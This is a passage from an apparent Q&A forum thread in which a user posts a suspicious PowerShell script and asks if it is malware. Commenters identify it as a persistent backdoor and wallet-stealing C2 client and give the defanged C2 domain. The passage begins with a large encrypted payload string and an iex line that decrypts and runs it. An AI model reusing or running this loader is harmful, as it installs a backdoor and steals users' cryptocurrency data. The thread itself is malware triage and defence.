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";
iex ( Decrypt-String $args[0] ([regex]::Matches($encryptedString,'.','RightToLeft') | ForEach {$_.value}) -join '');}
```

Is it a malware that decrypts your files and asks BTC for encrypting it back?

Comment: Yep, this is most certainly a persistent backdoor. Rename `xLogfile.jpeg` to `*.txt` and inspect the contents with a text editor if you want to find out what the payload actually does.

Comment: You've uploaded the wrong file (`xLog_file.jpeg`). The payload is in a file initially called `xLogfile.jpeg`, you might be able to find the copy at `$env:appdata\microsoft\SyncAppvPublishingServer.vbs` too (look at the 3rd to last line of the script)

Comment: Oh oki, i fixed it and updated the original post

Comment: Looks like the key to decrypt the iex command (which probably downloads some stuff) is found under `C:\Users\Public\%ComputerName%.txt`. Using the content of that txt file, you could decrypt the encrypted string in hashbacktrack function and figure what it does.

Comment: The first code block seems to create a scheduled task that hits in about 15 minutes after running that code.

Comment: @SkillSlap If you decrypt the long base64 string with the provided methods (remember to remove or comment out the `iex` statement so it doesn't execute it), if looks like a C2 client with a bunch of detection functions for either cryptominers or crypto wallet extensions in a number of browsers - the script gathers the information about installed software/extensions, sends it to a C2 domain (`hXXp://microsoft-analyse[.]com`) and then executes any command the C2 sends back to it.

Comment: If you decode the string, it gives you a lot of code that will generate some encryption stuff. It also connects to `hxxp://microsoft-analyse.com/connect` as @MathiasR.Jessen pointed out to install something that is called a User agent from within Mozilla Firefox. It also includes some strings that are required to pay in BTC.

Comment: I am not able to download the 'connect' file in a sandbox machine, so it might already have been taken offline.

Comment: Thanx guys, u r the best <3 I think i dodged the bullet by disabling internet within 5 mins or may be he has misconfigured the malware. I only had metamask installed in chrome and no extension installed on Firefox since i dont use it much. I think i will format my pc and change metamask password just in case to be completely sure. Thanx again for your help

Comment: @SkillSlap: Luckily you've came here :-)
Formatting the device seems like a good idea indeed.
FYI: A lot of (paid) antimalware suites now have deep learning capabilities that would've disabled the behaviour of the files before executing them.

Answer (score 0):

Navigate to virustotal.com and upload xLogfile.jpeg and see what it says about the file

Comment: This does not provide an answer to the question. Once you have sufficient [reputation](https://stackoverflow.com/help/whats-reputation) you will be able to [comment on any post](https://stackoverflow.com/help/privileges/comment); instead, [provide answers that don't require clarification from the asker](https://meta.stackexchange.com/questions/214173/why-do-i-need-50-reputation-to-comment-what-can-i-do-instead).